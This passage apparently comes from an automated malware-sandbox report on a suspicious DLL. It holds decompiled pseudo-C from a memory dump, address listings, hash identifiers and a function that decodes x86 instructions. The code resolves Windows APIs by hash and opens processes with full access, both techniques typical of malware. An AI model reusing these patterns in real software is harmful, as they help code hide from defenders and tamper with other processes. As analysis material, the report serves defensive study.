					E6ECFB658(_t449 + 0x24,  *(_t449 + 0x6c), 0x7fffffff);
					if(E6ECFF4D0(_t449 + 0x24) == 0) {
						goto L3;
					} else {
						( *(_t449 + 4))[0xb] = 0;
						E6ECFF654(_t449 + 0x24);
					}
					L60:
					_t317 = 0xffffffffffffffff;
					L62:
					if(_t317 != 0) {
						L65:
						return _t317;
					}
					if( *(_t449 + 0x84) != 0x20) {
						E6ED02234(0x5dc, _t413, _t430);
						 *(_t449 + 0x84) =  *(_t449 + 0x84) + 1;
						continue;
					}
					_t317 = 0xffffffffffffffff;
					goto L65;
					L3:
					__eflags =  *( *(_t449 + 4));
					if( *( *(_t449 + 4)) <= 0) {
						L21:
						__eflags =  *(_t449 + 0x20);
						if( *(_t449 + 0x20) <= 0) {
							L33:
							E6ECFF654(_t449 + 0x24);
							_t173 =  *(_t449 + 4);
							__eflags = _t173[0xb];
							if(_t173[0xb] == 0) {
								L46:
								 *((intOrPtr*)(_t449 + 8)) = 0;
								 *((intOrPtr*)(_t449 + 0xc)) = 0;
								E6ECFF584(_t449 + 0x14, 0);
								 *((intOrPtr*)(_t449 + 0x34)) =  *((intOrPtr*)(_t449 + 0x68));
								 *((intOrPtr*)(_t449 + 0x38)) = 0;
								E6ECFF584(_t449 + 0x40, 0);
								_t178 =  *(_t449 + 4);
								_t414 = 0x40;
								__eflags = _t178[6] - 0x40;
								_t415 =  <  ? _t178[6] : _t414;
								 *(_t449 + 0x80) = _t415;
								__eflags = _t415;
								if(_t415 <= 0) {
									L57:
									_t413 = E6ECFF4BC(_t449 + 0x14, 0);
									_t180 = E6ED02908( *((intOrPtr*)(_t449 + 0xc)), _t179, 0x3e8);
									_t132 = _t180 - 0x80; // -128
									_t181 = _t132;
									__eflags = _t181 - 0x3f;
									_t315 =  <=  ? _t181 : _t180;
									__eflags = _t315 - 0x102;
									if(_t315 == 0x102) {
										L59:
										E6ECFB5C4(_t449 + 0x34);
										E6ECFB5C4(_t449 + 8);
										goto L60;
									}
									__eflags = _t315 - 0x3f;
									if(_t315 <= 0x3f) {
										__eflags = _t315 << 2;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 8)) + 0x2c)) =  *((intOrPtr*)(E6ECFF4BC( *(_t449 + 4), _t315 << 2)));
										_t188 = E6ECFF4BC( *(_t449 + 0x7c), _t315 << 2);
										_t413 =  *(_t449 + 4);
										 *((intOrPtr*)(_t413 + 0x30)) =  *_t188;
										_t317 =  *((intOrPtr*)(_t413 + 0x2c));
										E6ECFB5C4(_t449 + 0x34);
										E6ECFB5C4(_t449 + 8);
										goto L62;
									}
									goto L59;
								}
								_t446 = 0;
								__eflags = 0;
								while(1) {
									E6ECFCA8C(_t449 + 0x4c);
									_t413 = 0;
									_t343 = _t449 + 0x4c;
									 *((char*)(_t343 + 4)) = 0;
									 *((intOrPtr*)(_t343 + 0x20)) = 0;
									__eflags = E6ECFC280(_t343);
									if(__eflags != 0) {
										break;
									}
									E6ECFF828(_t449 + 0x14, E6ECFF4CC(_t449 + 0x10) + 4);
									 *((intOrPtr*)(E6ECFF4BC(_t449 + 0x14, E6ECFF4CC(_t449 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t449 + 0x4c));
									 *((intOrPtr*)(_t449 + 0xc)) =  *((intOrPtr*)(_t449 + 0xc)) + 1;
									_t202 = E6ED03064(0x60a28c5c, 0x3659ae1e);
									__eflags = _t202;
									if(_t202 == 0) {
										L51:
										_t413 =  *(_t449 + 0x6c);
										__eflags = _t413;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t413 - 0xffffffff;
										if(__eflags != 0) {
											E6ECFF828(_t449 + 0x40, E6ECFF4CC(_t449 + 0x3c) + 4);
											 *(E6ECFF4BC(_t449 + 0x40, E6ECFF4CC(_t449 + 0x3c) + 0xfffffffc)) =  *(_t449 + 0x6c);
											 *((intOrPtr*)(_t449 + 0x4c - 0x14)) =  *((intOrPtr*)(_t449 + 0x4c - 0x14)) + 1;
											E6ECFCD24(_t449 + 0x4c, __eflags);
											_t446 = _t446 + 1;
											__eflags = _t446 -  *(_t449 + 0x80);
											if(_t446 <  *(_t449 + 0x80)) {
												continue;
											}
											_t431 = 0;
											__eflags = 0;
											do {
												_t211 = E6ECFF4BC( *(_t449 + 4), _t431 * 4);
												_t212 = E6ECFF4BC(_t449 + 0x40, _t431 * 4);
												E6ECF8B58( *_t211, E6ED002B0(0x60a28c5c, 0x840d15ae),  *_t212, 0, 0);
												_t431 = _t431 + 1;
												__eflags = _t431 -  *(_t449 + 0x80);
											} while (_t431 <  *(_t449 + 0x80));
											goto L57;
										}
										break;
									}
									_t413 = 0;
									_push(2);
									_push(0);
									_push(0);
									_push(_t449 + 0x6c);
									_push( *((intOrPtr*)(_t449 + 0x78)));
									_push( *((intOrPtr*)(_t449 + 0x60)));
									_push(0xffffffff);
									asm("int3");
									asm("int3");
									__eflags = _t202;
									if(__eflags != 0) {
										break;
									}
									goto L51;
								}
								E6ECFCD24(_t449 + 0x4c, __eflags);
								goto L59;
							}
							_t427 =  *_t173;
							__eflags = _t427;
							if(_t427 <= 0) {
								goto L46;
							}
							_t430 = 0;
							__eflags = 0;
							_t322 =  &(_t173[1]);
							while(1) {
								_t433 = _t430 * 4;
								_t217 = E6ECFF4BC(_t322, _t433);
								_t218 =  *(_t449 + 4);
								__eflags =  *_t217 - _t218[0xc];
								if( *_t217 == _t218[0xc]) {
									break;
								}
								_t430 = _t430 + 1;
								__eflags = _t430 - _t427;
								if(_t430 < _t427) {
									continue;
								}
								goto L46;
							}
							__eflags = _t430 - 0xffffffff;
							if(_t430 != 0xffffffff) {
								_t219 = E6ECFF4CC( *_t449);
								__eflags = _t219 - _t433;
								if(_t219 > _t433) {
									 *((intOrPtr*)(_t449 + 0x74)) = 4 + _t430 * 4;
									_t247 = E6ECFF4CC( *_t449);
									__eflags = _t247 -  *((intOrPtr*)(_t449 + 0x74));
									if(_t247 >  *((intOrPtr*)(_t449 + 0x74))) {
										 *((intOrPtr*)(_t449 + 0x90)) = E6ECFF4BC( *(_t449 + 4), _t433);
										 *((intOrPtr*)(_t449 + 0x8c)) = E6ECFF4BC( *(_t449 + 4),  *((intOrPtr*)(_t449 + 0x74)));
										E6ED038F0( *((intOrPtr*)(_t449 + 0x98)),  *((intOrPtr*)(_t449 + 0x90)), E6ECFF4CC( *_t449) -  *((intOrPtr*)(_t449 + 0x74)));
										_t449 = _t449 + 0xc;
									}
									E6ECFF828( *(_t449 + 4), E6ECFF4CC( *_t449) + 0xfffffffc);
									_t421 =  *(_t449 + 4);
									_t75 =  &(_t421[6]);
									 *_t75 = _t421[6] - 1;
									__eflags =  *_t75;
								}
								_t220 = E6ECFF4CC(_t322);
								__eflags = _t220 - _t433;
								if(_t220 > _t433) {
									_t430 = 4 + _t430 * 4;
									_t237 = E6ECFF4CC(_t322);
									__eflags = _t237 - _t430;
									if(_t237 > _t430) {
										_t238 = E6ECFF4BC(_t322, _t433);
										 *((intOrPtr*)(_t449 + 0x94)) = E6ECFF4BC(_t322, _t430);
										E6ED038F0(_t238,  *((intOrPtr*)(_t449 + 0x98)), E6ECFF4CC(_t322) - _t430);
										_t449 = _t449 + 0xc;
									}
									E6ECFF828(_t322, E6ECFF4CC(_t322) + 0xfffffffc);
									_t246 =  *(_t449 + 4);
									 *_t246 =  *_t246 - 1;
									__eflags =  *_t246;
								}
								E6ECFF828( *(_t449 + 4), E6ECFF4CC( *_t449) + 4);
								 *(E6ECFF4BC( *(_t449 + 4), E6ECFF4CC( *_t449) + 0xfffffffc)) = ( *(_t449 + 4))[0xb];
								( *(_t449 + 4))[6] = ( *(_t449 + 4))[6] + 1;
								E6ECFF828(_t322, E6ECFF4CC(_t322) + 4);
								 *(E6ECFF4BC(_t322, E6ECFF4CC(_t322) + 0xfffffffc)) = ( *(_t449 + 4))[0xc];
								 *( *(_t449 + 4)) =  *( *(_t449 + 4)) + 1;
							}
							goto L46;
						}
						_t323 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x7c) = _t323 * 4;
							_t428 = E6ECFF4BC(_t449 + 0x28, _t323 * 4);
							_t258 =  *(_t449 + 4);
							_t430 =  *_t258;
							__eflags = _t430;
							if(_t430 <= 0) {
								L29:
								_t437 = E6ED03064(0x8e844d1e, 0x5c3654e3);
								__eflags = _t437;
								if(_t437 != 0) {
									_t439 =  *_t437(0x1fffff, 0,  *((intOrPtr*)(E6ECFF4BC(_t449 + 0x28,  *(_t449 + 0x7c)))));
									__eflags = _t439;
									if(_t439 != 0) {
										E6ECFF828( *(_t449 + 4), E6ECFF4CC( *_t449) + 4);
										 *(E6ECFF4BC( *(_t449 + 4), E6ECFF4CC( *_t449) + 0xfffffffc)) = _t439;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) + 1;
										_t269 = E6ECFF4BC(_t449 + 0x28,  *(_t449 + 0x7c));
										 *(_t449 + 0x70) =  &(( *(_t449 + 4))[1]);
										E6ECFF828( *((intOrPtr*)(_t449 + 0x74)), E6ECFF4CC( &(( *(_t449 + 4))[1])) + 4);
										 *((intOrPtr*)(E6ECFF4BC( *((intOrPtr*)(_t449 + 0x74)), E6ECFF4CC( *(_t449 + 0x70)) + 0xfffffffc))) =  *_t269;
										_t277 =  *(_t449 + 4);
										 *_t277 =  *_t277 + 1;
										__eflags =  *_t277;
									}
								}
								goto L32;
							}
							_t438 = 0;
							__eflags = 0;
							 *(_t449 + 0x88) =  &(_t258[1]);
							while(1) {
								_t279 = E6ECFF4BC( *((intOrPtr*)(_t449 + 0x8c)), _t438 * 4);
								__eflags =  *_t279 -  *_t428;
								if( *_t279 ==  *_t428) {
									break;
								}
								_t438 = _t438 + 1;
								__eflags = _t438 - _t430;
								if(_t438 < _t430) {
									continue;
								}
								goto L29;
							}
							__eflags = _t438 - 0xffffffff;
							if(_t438 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t323 = _t323 + 1;
							__eflags = _t323 -  *(_t449 + 0x20);
						} while (_t323 <  *(_t449 + 0x20));
						goto L33;
					} else {
						_t324 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x64) = _t324 * 4;
							_t429 = E6ECFF4BC( *(_t449 + 0x7c), _t324 * 4);
							_t430 =  *(_t449 + 0x20);
							__eflags = _t430;
							if(_t430 <= 0) {
								L11:
								_t430 =  &(( *(_t449 + 4))[1]);
								_t283 = E6ECFF4CC( &(( *(_t449 + 4))[1]));
								__eflags = _t283 -  *(_t449 + 0x64);
								if(_t283 >  *(_t449 + 0x64)) {
									_t443 = 4 + _t324 * 4;
									_t299 = E6ECFF4CC(_t430);
									__eflags = _t299 - _t443;
									if(_t299 > _t443) {
										 *((intOrPtr*)(_t449 + 0x9c)) = E6ECFF4BC(_t430,  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0x98)) = E6ECFF4BC(_t430, _t443);
										E6ED038F0( *((intOrPtr*)(_t449 + 0xa4)),  *((intOrPtr*)(_t449 + 0x9c)), E6ECFF4CC(_t430) - _t443);
										_t449 = _t449 + 0xc;
									}
									E6ECFF828(_t430, E6ECFF4CC(_t430) + 0xfffffffc);
									_t308 =  *(_t449 + 4);
									 *_t308 =  *_t308 - 1;
									__eflags =  *_t308;
								}
								_t442 = E6ED03064(0x60a28c5c, 0xe96b154c);
								__eflags = _t442;
								if(_t442 != 0) {
									 *_t442( *(E6ECFF4BC( *(_t449 + 4),  *(_t449 + 0x64))));
								}
								_t285 = E6ECFF4CC( *_t449);
								__eflags = _t285 -  *(_t449 + 0x64);
								if(_t285 >  *(_t449 + 0x64)) {
									_t445 = 4 + _t324 * 4;
									_t287 = E6ECFF4CC( *_t449);
									__eflags = _t287 - _t445;
									if(_t287 > _t445) {
										_t430 = E6ECFF4BC( *(_t449 + 4),  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0xa0)) = E6ECFF4BC( *(_t449 + 4), _t445);
										E6ED038F0(_t288,  *((intOrPtr*)(_t449 + 0xa4)), E6ECFF4CC( *_t449) - _t445);
										_t449 = _t449 + 0xc;
									}
									E6ECFF828( *(_t449 + 4), E6ECFF4CC( *_t449) + 0xfffffffc);
									_t296 =  *(_t449 + 4);
									_t33 =  &(_t296[6]);
									 *_t33 = _t296[6] - 1;
									__eflags =  *_t33;
								}
								_t324 = _t324 - 1;
								__eflags = _t324;
								goto L20;
							}
							_t444 = 0;
							__eflags = 0;
							while(1) {
								_t310 = E6ECFF4BC(_t449 + 0x28, _t444 * 4);
								__eflags =  *_t310 -  *_t429;
								if( *_t310 ==  *_t429) {
									break;
								}
								_t444 = _t444 + 1;
								__eflags = _t444 - _t430;
								if(_t444 < _t430) {
									continue;
								}
								goto L11;
							}
							__eflags = _t444 - 0xffffffff;
							if(_t444 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t324 = _t324 + 1;
							__eflags = _t324 -  *( *(_t449 + 4));
						} while (_t324 <  *( *(_t449 + 4)));
						goto L21;
					}
				}
			}

0x6ecf8435
0x6ecf843b
0x6ecf843f
0x6ecf8443
0x6ecf844e
0x6ecf8452
0x6ecf8457
0x6ecf845f
0x6ecf846f
0x00000000
0x6ecf8471
0x6ecf8479
0x6ecf8480
0x6ecf8480
0x6ecf89d3
0x6ecf89d5
0x6ecf8a16
0x6ecf8a18
0x6ecf8a27
0x6ecf8a33
0x6ecf8a33
0x6ecf8a22
0x6ecf8a39
0x6ecf8a3e
0x00000000
0x6ecf8a3e
0x6ecf8a26
0x00000000
0x6ecf848a
0x6ecf848e
0x6ecf8491
0x6ecf8599
0x6ecf8599
0x6ecf859e
0x6ecf86c1
0x6ecf86c5
0x6ecf86ca
0x6ecf86ce
0x6ecf86d2
0x6ecf8808
0x6ecf880a
0x6ecf880e
0x6ecf8817
0x6ecf8822
0x6ecf8826
0x6ecf882f
0x6ecf8834
0x6ecf883a
0x6ecf883b
0x6ecf883f
0x6ecf8843
0x6ecf884a
0x6ecf884c
0x6ecf898c
0x6ecf899d
0x6ecf89a4
0x6ecf89ab
0x6ecf89ab
0x6ecf89ae
0x6ecf89b1
0x6ecf89b4
0x6ecf89ba
0x6ecf89c1
0x6ecf89c5
0x6ecf89ce
0x00000000
0x6ecf89ce
0x6ecf89bc
0x6ecf89bf
0x6ecf89d8
0x6ecf89f0
0x6ecf89f3
0x6ecf89f8
0x6ecf8a02
0x6ecf8a05
0x6ecf8a08
0x6ecf8a11
0x00000000
0x6ecf8a11
0x00000000
0x6ecf89bf
0x6ecf8854
0x6ecf8854
0x6ecf8856
0x6ecf885a
0x6ecf885f
0x6ecf8861
0x6ecf8865
0x6ecf8868
0x6ecf8870
0x6ecf8872
0x00000000
0x00000000
0x6ecf8889
0x6ecf88a4
0x6ecf88a6
0x6ecf88b4
0x6ecf88b9
0x6ecf88bb
0x6ecf88d8
0x6ecf88d8
0x6ecf88dc
0x6ecf88de
0x00000000
0x00000000
0x6ecf88e0
0x6ecf88e3
0x6ecf8904
0x6ecf8923
0x6ecf8929
0x6ecf892c
0x6ecf8931
0x6ecf8932
0x6ecf8939
0x00000000
0x00000000
0x6ecf8941
0x6ecf8941
0x6ecf8943
0x6ecf894f
0x6ecf895b
0x6ecf897d
0x6ecf8982
0x6ecf8983
0x6ecf8983
0x00000000
0x6ecf8943
0x00000000
0x6ecf88e3
0x6ecf88bd
0x6ecf88c3
0x6ecf88c5
0x6ecf88c6
0x6ecf88c7
0x6ecf88c8
0x6ecf88cc
0x6ecf88d0
0x6ecf88d2
0x6ecf88d3
0x6ecf88d4
0x6ecf88d6
0x00000000
0x00000000
0x00000000
0x6ecf88d6
0x6ecf88e9
0x00000000
0x6ecf88e9
0x6ecf86d8
0x6ecf86da
0x6ecf86dc
0x00000000
0x00000000
0x6ecf86e6
0x6ecf86e6
0x6ecf86e8
0x6ecf86eb
0x6ecf86ed
0x6ecf86f5
0x6ecf86fc
0x6ecf8700
0x6ecf8703
0x00000000
0x00000000
0x6ecf87ff
0x6ecf8800
0x6ecf8802
0x00000000
0x00000000
0x00000000
0x6ecf8802
0x6ecf8709
0x6ecf870c
0x6ecf8715
0x6ecf871a
0x6ecf871c
0x6ecf8728
0x6ecf872c
0x6ecf8731
0x6ecf8735
0x6ecf8b12
0x6ecf8b26
0x6ecf8b48
0x6ecf8b4d
0x6ecf8b4d
0x6ecf874b
0x6ecf8750
0x6ecf8754
0x6ecf8754
0x6ecf8754
0x6ecf8754
0x6ecf8759
0x6ecf875e
0x6ecf8760
0x6ecf8764
0x6ecf876b
0x6ecf8770
0x6ecf8772
0x6ecf8ad3
0x6ecf8ae2
0x6ecf8afb
0x6ecf8b00
0x6ecf8b00
0x6ecf8785
0x6ecf878a
0x6ecf878e
0x6ecf878e
0x6ecf878e
0x6ecf87a0
0x6ecf87c1
0x6ecf87c9
0x6ecf87d7
0x6ecf87f5
0x6ecf87fb
0x6ecf87fb
0x00000000
0x6ecf870c
0x6ecf85a4
0x6ecf85a4
0x6ecf85a6
0x6ecf85ad
0x6ecf85bb
0x6ecf85bd
0x6ecf85c1
0x6ecf85c3
0x6ecf85c5
0x6ecf8600
0x6ecf860f
0x6ecf8611
0x6ecf8613
0x6ecf8631
0x6ecf8633
0x6ecf8635
0x6ecf8647
0x6ecf8665
0x6ecf866e
0x6ecf8671
0x6ecf867f
0x6ecf8690
0x6ecf86ae
0x6ecf86b0
0x6ecf86b4
0x6ecf86b4
0x6ecf86b4
0x6ecf8635
0x00000000
0x6ecf8613
0x6ecf85cb
0x6ecf85cb
0x6ecf85d0
0x6ecf85d7
0x6ecf85e6
0x6ecf85ed
0x6ecf85ef
0x00000000
0x00000000
0x6ecf85fb
0x6ecf85fc
0x6ecf85fe
0x00000000
0x00000000
0x00000000
0x6ecf85fe
0x6ecf85f1
0x6ecf85f4
0x00000000
0x00000000
0x6ecf86b6
0x6ecf86b6
0x6ecf86b7
0x6ecf86b7
0x00000000
0x6ecf8497
0x6ecf8497
0x6ecf8497
0x6ecf8499
0x6ecf84a0
0x6ecf84ae
0x6ecf84b0
0x6ecf84b4
0x6ecf84b6
0x6ecf84e2
0x6ecf84e6
0x6ecf84eb
0x6ecf84f0
0x6ecf84f4
0x6ecf84f8
0x6ecf84ff
0x6ecf8504
0x6ecf8506
0x6ecf8a95
0x6ecf8aa4
0x6ecf8ac3
0x6ecf8ac8
0x6ecf8ac8
0x6ecf8519
0x6ecf851e
0x6ecf8522
0x6ecf8522
0x6ecf8522
0x6ecf8533
0x6ecf8535
0x6ecf8537
0x6ecf8548
0x6ecf8548
0x6ecf854d
0x6ecf8552
0x6ecf8556
0x6ecf855b
0x6ecf8562
0x6ecf8567
0x6ecf8569
0x6ecf8a57
0x6ecf8a63
0x6ecf8a7d
0x6ecf8a82
0x6ecf8a82
0x6ecf857f
0x6ecf8584
0x6ecf8588
0x6ecf8588
0x6ecf8588
0x6ecf8588
0x6ecf858b
0x6ecf858b
0x00000000
0x6ecf858b
0x6ecf84ba
0x6ecf84ba
0x6ecf84bc
0x6ecf84c8
0x6ecf84cf
0x6ecf84d1
0x00000000
0x00000000
0x6ecf84dd
0x6ecf84de
0x6ecf84e0
0x00000000
0x00000000
0x00000000
0x6ecf84e0
0x6ecf84d3
0x6ecf84d6
0x00000000
0x00000000
0x6ecf858c
0x6ecf8590
0x6ecf8591
0x6ecf8591
0x00000000
0x6ecf8499
0x6ecf8491

Strings

, xrefs: 6ECF8A1A

Memory Dump Source

Source File: 00000001.00000002.693021141.000000006ECF1000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: true

Associated: 00000001.00000002.692999232.000000006ECF0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693073073.000000006ED0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693089731.000000006ED0D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.693101054.000000006ED0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 6ef57238032d434573a229406e5b3f471aaa2c466f36d27769f972841248c63e
Instruction ID: e388dde2f98bb5f30808effee5d5b1af70e9f11886c71cd9f91a1a7ed1d2b582
Opcode Fuzzy Hash: 6ef57238032d434573a229406e5b3f471aaa2c466f36d27769f972841248c63e
Instruction Fuzzy Hash: EA127372204345DFC794DFA5C890AAE77E9EF85704F104D2DEA99872A1FB309D06CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6ED09370, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E6ED09370(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				signed int _t250;
				signed char _t251;
				signed char* _t254;
				char _t255;
				signed short _t256;
				char _t257;
				signed short _t260;
				signed int _t261;
				signed int _t262;
				void* _t264;
				void* _t272;
				void* _t273;
				signed short* _t274;
				signed char _t275;
				signed int _t277;
				signed int _t278;
				void* _t282;
				signed int _t288;
				unsigned int _t290;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				unsigned int _t296;
				unsigned int _t297;
				signed int _t299;
				unsigned int _t301;
				signed char _t302;
				signed int _t304;
				signed char _t307;
				signed char _t308;
				signed int _t309;
				void* _t312;
				void* _t313;
				signed int _t314;
				signed int _t316;
				signed int _t319;
				signed int _t321;
				signed int _t338;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				unsigned int* _t346;
				unsigned int _t354;
				signed int _t355;
				void* _t357;
				signed int _t364;
				signed int _t366;
				signed int _t383;
				signed int _t388;
				signed int _t391;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t403;
				signed int _t408;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t417;
				signed int _t419;
				signed int _t424;
				void* _t426;
				signed int* _t427;

				 *((intOrPtr*)(_t426 + 0x24)) = __edx;
				 *((intOrPtr*)(_t426 + 0x10)) = __ecx;
				 *((intOrPtr*)(_t426 + 0x14)) = __ecx;
				_t274 =  *(_t426 + 0x48);
				E6ED03698( *(_t426 + 0x48), 0, 0x1c);
				_t427 = _t426 + 0xc;
				_t338 = 0;
				_t282 = 0x10;
				do {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					if(_t250 == 0xf3) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000004;
						L17:
						_t338 = _t339 & 0x000000ff;
						 *(_t383 + 1) = _t250;
						goto L18;
					}
					if(_t250 == 0xf2) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000002;
						goto L17;
					}
					if(_t250 == 0xf0) {
						_t338 = (_t338 | 0x00000020) & 0x000000ff;
						 *(_t427[0x10] + 2) = _t250;
						goto L18;
					}
					if(_t250 == 0x26 || _t250 == 0x2e || _t250 == 0x36 || _t250 == 0x3e) {
						L13:
						_t338 = (_t338 | 0x00000040) & 0x000000ff;
						 *(_t427[0x10] + 3) = _t250;
					} else {
						_t6 = _t250 - 0x64; // -100
						if(_t6 <= 1) {
							goto L13;
						}
						if(_t250 == 0x66) {
							_t338 = (_t338 | 0x00000008) & 0x000000ff;
							 *(_t427[0x10] + 4) = _t250;
							goto L18;
						}
						if(_t250 != 0x67) {
							break;
						} else {
							_t338 = _t338 | 0x00000010;
							 *(_t427[0x10] + 5) = _t250;
							goto L18;
						}
					}
					L18:
					_t282 = _t282 + 0xff;
				} while (_t282 != 0);
				_t388 = _t427[0x10];
				_t285 =  !=  ? _t338 : 1;
				_t343 = _t338 << 0x17;
				 *(_t388 + 6) = _t250;
				 *_t427 =  !=  ? _t338 : 1;
				 *(_t388 + 0x18) = _t343;
				if(_t250 == 0xf) {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					_t427[5] = _t250;
					 *(_t427[0x10] + 7) = _t250;
					_t427[2] = _t427[4] + 0x4a;
				} else {
					_t22 = _t250 - 0xa0; // -160
					_t427[5] =  *(_t427[0x10] + 7) & 0x000000ff;
					if(_t22 <= 3) {
						_t424 =  *_t427;
						_t382 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
						 *_t427 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
					}
				}
				_t354 = _t250 >> 2;
				_t391 = _t250 & 0x00000003;
				_t345 = _t427[2];
				_t427[3] = _t391;
				_t427[6] = _t354;
				_t288 =  *(( *(_t354 + _t345) & 0x000000ff) + _t391 + _t345) & 0x000000ff;
				_t427[1] = _t288;
				if(_t288 == 0xff) {
					_t343 = _t343 + 0x3000;
					_t288 = 0 | (_t250 & 0xfffffffd) == 0x00000024;
					 *(_t427[0x10] + 0x18) = _t343;
					_t427[1] = _t288;
				}
				if((_t427[1] & 0x00000080) != 0) {
					_t290 =  *((_t288 & 0x0000007f) + _t345) & 0x0000ffff;
					_t427[1] = _t290;
					_t395 = _t290 >> 8;
				} else {
					_t395 = 0;
				}
				if(_t427[5] != 0 && ( *_t427 &  *(( *(_t427[6] + _t427[4] + 0x130) & 0x000000ff) + _t427[3] + _t427[4] + 0x130) & 0x000000ff) != 0) {
					_t343 = _t343 | 0x00003000;
					 *(_t427[0x10] + 0x18) = _t343;
				}
				if((_t427[1] & 0x00000001) == 0) {
					if(( *_t427 & 0x00000020) != 0) {
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					goto L114;
				} else {
					_t355 = _t427[0x10];
					_t343 = _t343 | 0x00000001;
					 *(_t355 + 0x18) = _t343;
					_t296 =  *_t274 & 0x000000ff;
					_t346 =  &(_t427[6]);
					 *_t346 = _t296;
					 *(_t355 + 8) = _t296;
					_t297 = _t296 >> 6;
					_t427[3] = _t297;
					 *(_t355 + 9) = _t297;
					_t299 =  *_t346 & 0x00000007;
					_t427[7] = _t299;
					 *(_t355 + 0xb) = _t299;
					_t301 =  *_t346 & 0x0000003f;
					 *_t346 = _t301;
					_t302 = _t301 >> 3;
					_t427[2] = _t302;
					 *(_t355 + 0xa) = _t302;
					if(_t395 != 0 && (_t395 << _t302 & 0x00000080) != 0) {
						_t343 = _t343 | 0x00003000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					if(_t427[5] == 0) {
						_t80 = _t250 - 0xd9; // -217
						if(_t80 <= 6) {
							_t81 = _t250 + 0x27; // 0x27
							_t417 = _t81 & 0x000000ff;
							if(_t427[3] != 3) {
								_t419 = ( *(_t417 + _t427[4] + 0xf1) & 0x000000ff) << _t427[2];
							} else {
								_t419 = ( *(_t427[4] + _t427[2] + 0xf8 + _t417 * 8) & 0x000000ff) << _t427[7];
							}
							if((_t419 & 0x00000080) != 0) {
								_t343 = _t343 | 0x00003000;
								 *(_t427[0x10] + 0x18) = _t343;
							}
						}
					}
					if(( *_t427 & 0x00000020) == 0) {
						L52:
						if(_t427[5] == 0) {
							if(_t250 == 0x8c) {
								L85:
								if(_t427[2] <= 5) {
									L87:
									_t427[5] = _t274[0];
									_t427[4] =  &(_t274[1]);
									if(_t427[2] <= 1) {
										if(_t250 != 0xf6) {
											_t309 = _t427[1];
											_t310 =  ==  ? _t309 | 0xffffff90 : _t309;
											_t427[1] =  ==  ? _t309 | 0xffffff90 : _t309;
										} else {
											_t427[1] = _t427[1] | 0xffffff82;
										}
									}
									if(_t427[3] == 0) {
										if(( *_t427 & 0x00000010) == 0) {
											_t264 = 4;
											_t357 =  ==  ? _t264 : 0;
										} else {
											_t273 = 2;
											_t357 =  ==  ? _t273 : 0;
										}
									} else {
										if(_t427[3] == 1) {
											_t357 = 1;
										} else {
											if(_t427[3] == 2) {
												_t357 = (( !( *_t427) & 0x00000010) >> 3) + 2;
											} else {
												_t357 = 0;
											}
										}
									}
									if(_t427[3] != 3 && _t427[7] == 4 && ( *_t427 & 0x00000010) == 0) {
										_t307 = _t427[5];
										_t343 = _t343 | 0x00000002;
										_t403 = _t427[0x10];
										_t427[4] =  &(_t274[1]);
										 *(_t403 + 0xc) = _t307;
										_t308 = _t307 & 0x00000007;
										 *(_t403 + 0x18) = _t343;
										 *(_t403 + 0xd) = _t307 >> 6;
										 *(_t403 + 0xe) = (_t307 & 0x0000003f) >> 3;
										 *(_t403 + 0xf) = _t308;
										if(_t308 == 5) {
											_t272 = 4;
											_t357 =  ==  ? _t272 : _t357;
										}
									}
									if(_t357 == 1) {
										_t304 = _t427[0x10];
										_t343 = _t343 | 0x00000020;
										 *(_t304 + 0x18) = _t343;
										 *((char*)(_t304 + 0x14)) =  *(_t427[4] - 1);
									} else {
										if(_t357 == 2) {
											_t277 = _t427[0x10];
											_t343 = _t343 | 0x00000040;
											 *(_t277 + 0x18) = _t343;
											 *((short*)(_t277 + 0x14)) =  *(_t427[4] - 1) & 0x0000ffff;
										} else {
											if(_t357 == 4) {
												_t278 = _t427[0x10];
												_t343 = _t343 | 0x00000080;
												 *(_t278 + 0x18) = _t343;
												 *(_t278 + 0x14) =  *(_t427[4] - 1);
											}
										}
									}
									_t195 = _t427[4] - 1; // -1
									_t274 = _t357 + _t195;
									L114:
									_t251 = _t427[1];
									_t292 = _t251 & 0x00000040;
									if((_t251 & 0x00000010) == 0) {
										L121:
										if((_t427[1] & 0x00000004) == 0) {
											L129:
											if((_t427[1] & 0x00000002) != 0) {
												_t396 = _t427[0x10];
												_t343 = _t343 | 0x00000004;
												 *(_t396 + 0x18) = _t343;
												_t257 =  *_t274;
												_t274 =  &(_t274[0]);
												 *((char*)(_t396 + 0x10)) = _t257;
											}
											if(_t292 == 0) {
												if((_t427[1] & 0x00000020) != 0) {
													_t293 = _t427[0x10];
													_t343 = _t343 | 0x00000104;
													 *(_t293 + 0x18) = _t343;
